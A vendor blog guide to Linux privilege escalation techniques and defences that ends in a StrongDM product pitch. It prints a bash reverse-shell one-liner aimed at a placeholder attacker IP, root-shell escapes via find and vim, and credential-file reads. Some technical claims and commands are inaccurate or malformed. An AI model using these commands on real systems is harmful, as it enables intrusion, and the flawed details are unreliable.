Linux Privilege Escalation: Techniques, Prevention & More

For Linux operating systems that support multiple users, privileges exist as a way to control what a user can do. Linux privilege escalation refers to the unauthorized act of gaining elevated permissions rather than legitimate, controlled privilege use. It's one of the most common tactics that threat actors use to infiltrate Linux systems and perform malicious actions like stealing data, deleting files, or taking over the whole system.

In this guide, we’ll focus on how malicious actors use Linux privilege escalation to conduct attacks and what you can do to protect your system. Let’s dive in.

What Is Linux Privilege Escalation?

A Linux privilege escalation attack is the process of exploiting a security vulnerability in a Linux system to gain elevated permissions and access. The result is an application or user gaining more privileges than intended, usually resulting in a security or data breach.

Linux privilege escalation involves an attacker looking for weak spots in your system’s defenses so they can enter or gain privileged access. Usually, this occurs when an attacker steals credentials from a user with basic or limited rights. Once inside the system, they use enumeration tactics to elevate their permissions to the root or superuser. This essentially gives them ultimate control of the system. 

Permission Hierarchies in Linux

Permission hierarchies are what control users’ access to and actions (permissions) on files and directories in Linux systems. There are three main permission types available with Linux: 

• Read allows a user or group to only view the contents of a file. 
• Write grants users or groups the ability to modify or change the contents of a file or directory — users can add, delete, or rename files. 
• Execute enables users to run a file if it's a program or script. This permission also gives users the ability to access and traverse a directory.

Linux permissions also include ownership (User, Group, and Others) and special permissions (SUID, SGID, Sticky Bit). 

Essential Linux Privesc Commands

Before you learn how attackers can escalate their privileges in Linux, you must first understand the basic syntax involved. 

Basic Enumeration Commands

Enumeration is the process of gathering information about your system to understand its structure, users, services, and potential vulnerabilities. 

An attacker can leverage basic commands such as:

• whoami: This helps identify the current user. 
• id: This command displays the user’s ID, the group ID, and the groups the user belongs to.
• hostname: This reveals the Linux system’s hostname.

System Information Gathering

The attacker may also need further information about your system. To do so, they can use:

• uname -a: This displays the system’s information and kernel version. 
• cat /etc/issue: This tells the hacker which Linux distribution you’re using.
• cat /etc/passwd: This lists all of the user accounts in the system.

Common Attack Vectors and Techniques

When attackers want to escalate their permissions in Linux, they usually go after privileged accounts such as the root user, forgotten administrator accounts, system accounts, and sudo users. 

Kernel Exploitation Methods

The Linux kernel is the core part of the operating system, which manages system and hardware processes. Kernel exploits aim to leverage existing bugs or flaws to execute arbitrary code, usually with root-level privileges. 

Usually, attackers use kernel exploits for Linux privilege escalation when a system is running an older kernel version. This is because many older versions have known vulnerabilities that threat actors can easily leverage to gain access to your operating system and take full control. 

Examples of these exploits include:

• Dirty COW (CVE-2016-5195): This infamous vulnerability impacted numerous Linux kernels before 2016. It allowed privilege escalation by exploiting a rare condition that affected the copy-on-write (COW) feature in the memory management system. This gave unprivileged local users the ability to write on read-only files, thus increasing their permissions on the system.
• Full Nelson Exploit: Named after the security researcher who discovered it, Nelson Elhage, this technique leverages a rare condition in the way Linux kernels handle the "pipe_buf" structures. These structures store data going through interprocess communication (IPC). This exploit works by manipulating these structures so an attacker can corrupt the kernel memory, overwrite important data structures like credentials, and ultimately escalate their privileges to root. 

SUID Binary Exploitation

When you execute a program in Linux, it typically runs with the permissions of the current user. However, certain actions, such as copying or viewing files in restricted directories, require privileged permissions. 

If you want to allow regular users to execute privileged actions, you can use the "Set owner User ID upon execution" (SUID) permission on the executable file. This action allows any user to execute the file with root privileges. However, some SUID programs execute as non-root users. 

Attackers can exploit the SUID binary to gain the shell of another user, usually the root user. If you want to find SUID binaries that attackers can exploit, you can use the command below:

find / -perm -4000 -type f -ls 2>/dev/null

The command above searches for any files (-type f) with the SUID bit set (-4000) in the root directory (/), while suppressing error messages (2>/dev/null) from directories the current user cannot access — "-ls" tells the command to return the output in a list format and display the permissions. 

Note: Running "find /" as a regular user may not display all SUID files due to permission restrictions. It’s best to use "sudo find / -perm -4000 -type f" instead.

PATH Variable Manipulation

Everything in Linux is usually a file, including commands, users, and more. The "PATH" variable specifies the locations of executable commands in your Linux system. If a hacker gains access to your Linux system, they can manipulate the PATH variable by adding a malicious script or binary into a directory they control and placing the directory in the PATH sequence. If they do this, the shell will execute the attacker’s version instead of the legitimate one when a privileged user runs a command.

This attack works when scripts or binaries are executed without specifying their full paths. Therefore, it’s a best practice to call system binaries using absolute paths like "/usr/bin/ls" instead of just "ls."

Sudo Rights Abuse

Sudo is a command-line tool that gives regular users root privileges or permissions. It also allows a user to perform actions with the privileges of another user. Attackers can abuse sudo rights to run commands that give them access to files they shouldn't have permission to view or edit. They can also abuse these rights to take over the whole system and shut down operations. 

Advanced Exploitation Techniques

The techniques discussed in the previous section are what attackers usually leverage because they’re easy to execute and often target outdated software with well-known misconfigurations. With advanced techniques, attackers target deeper system processes by using stealthier, harder-to-detect methods. 

These techniques include:

• Service exploitation: If your Linux system has service misconfigurations, hackers can leverage them to execute arbitrary code. This is especially true if you’ve configured the services in the system to run as root. Additionally, if those services let you execute commands using scripts or web interfaces, unauthorized users can use them to gain access. For instance, an attacker can use a misconfigured web server running PHP scripts as root to execute a malicious script.
• Capabilities abuse: Linux capabilities do not always equate to full root access. Some capabilities (e.g., CAP_NET_RAW) allow network access but not full system control. Therefore, attackers look for capabilities that allow arbitrary command execution.
• Scheduled tasks manipulation: If you have tasks scheduled on your Linux system, attackers can manipulate them for privilege escalation through the crontab utility. An unauthorized user can simply edit your crontab file with "crontab -e" to add, modify, or delete scheduled tasks. 

Real-World Attack Examples

To get a better understanding of how attackers escalate their privileges in Linux, let’s examine some attack examples.

FTP Service Exploitation

Misconfigured FTP services can be a gateway for Linux privilege escalation. First, the attacker checks for running services with a tool like "nmap," as shown below:

sudo nmap -sV -p 21 <target-ip>

If the FTP server allows anonymous access, the attacker can upload a reverse shell:

echo 'bash -i >& /dev/tcp/<attacker-ip>/4444 0>&1' > shell.sh ftp <target-ip> put shell.sh

Once successful, the attacker will find ways to execute the script to gain shell access. This can be through misconfigured uploads or cron jobs.

Note: The command above works only when FTP servers allow script execution or writable directories. 

Vulnerable SUID Applications

Using the command "find / -perm -4000 -type f -ls 2>/dev/null," attackers can find SUID binaries. Say, for instance, the hacker finds a vulnerable SUID binary like "find" or "awk." They can then can use it to spawn a root shell:

sudo find . -exec /bin/bash \;

After this, the attacker will confirm root access by running "whoami." If they do, they can create a new user with root privileges.

Misconfigured Sudo Rights

Usually, if an attacker gains access to a user account with sudo rights, the first thing they do is check the privileges that the account has. To do this, they can run the command below:

$ sudo -l

This lists all of the commands the user can run.

For instance, if the attacker finds that the compromised account can run the Vim editor with root user privileges, they can open the editor and execute commands. Using Vim’s shell escape feature, the hacker can get a root shell by using the following command:

sudo vim :!bash

Note: Vim's shell escape (:!bash) works only if not restricted by secure modes. Attackers, therefore, look for unrestricted sudo commands that allow shell execution.

Top Tools for Privilege Escalation

To protect your system from privilege escalation attacks, you can perform penetration testing or ethical hacking to identify misconfigurations and vulnerabilities. 

To do so, you can leverage several tools, including: 

• Linux Privilege Escalation Awesome Script (LinPEAS): This is a Linux enumeration script that searches for common misconfigurations and privilege escalation methods on the target host. It collects system and user information, privileged access, and environment information.
• Linux Enumeration Script (LinEnum): This script checks for all possible paths attackers can use to escalate privileges. 
• Linux Exploit Suggester 2: This script quickly finds and recommends potential kernel exploits based on system information.
• Unix Privesc Checker: This script audits your Linux system for file permissions and settings that allow local users to escalate their privileges. 
• Python-based detection tools: These tools can automatically detect privilege escalation attempts, which can sometimes be overwhelming when performed manually.

Prevention and Security Measures

Linux privilege escalation is a real threat that can cause system outages, crashes, and even data loss. Therefore, you must take proactive measures to protect your system, instead of just dealing with the aftermath. 

These measures include: 

• Leverage system hardening techniques: Your Linux system should be resilient against unauthorized access, especially for external threat actors. As such, you must minimize its attack surface through best practices such as using strong passwords, disabling SSH password authentication, restricting root log-ins, and enforcing multifactor authentication (MFA). 
• Conduct regular security audits: Continuously checking your system for vulnerabilities and paths for privilege escalation is vital. To do this, you can audit file permissions, review system logs for suspicious activity, and perform penetration testing.
• Implement access control best practices: Managing access is essential for preventing Linux privilege escalation attacks. For instance, you can adopt the principle of least privilege (PoLP), which gives users only the permissions that they require to perform their duties. You should also regularly monitor privileges to ensure that no account has more privileges than it needs.
• Know the latest CVEs and vulnerabilities: One way you can stay up to date with vulnerabilities is by following the NIST National Vulnerability Database (NVD) or Linux distribution security advisories (Ubuntu, Red Hat, Debian, etc.) These sources provide official patches, fixes, and upgrade instructions for vulnerabilities affecting each distro.

How StrongDM Prevents Privilege Escalation

Attackers are always on the hunt for misconfigurations and vulnerabilities that can allow them to access your Linux system. That’s why you need a solution that can help you proactively deal with Linux privilege escalation attempts around the clock. StrongDM is one such tool.

Our solution provides you with:

• Complete visibility: StrongDM gives you a bird’s-eye view of your Linux system so you can see who has access to what, when, and how. This is vital for identifying and shutting down unauthorized privilege escalation attempts before they cause serious damage.
• Time-based sudo access: Our solution makes granting privileges fast and secure through automation. It lets you give team members access to a resource only when needed and pull it back when no longer needed, which helps reduce attack windows.
• Session recording for forensic analysis: Every command executed by a privileged user is logged and recorded. So if a security incident occurs, you can trace back activities, detect suspicious behavior, and improve your security policies.
• Centralized role-based access control (RBAC): With StrongDM, you can enforce least-privilege access by defining granular permissions based on job roles.

Ready to experience the power of StrongDM? Sign up for a demo today.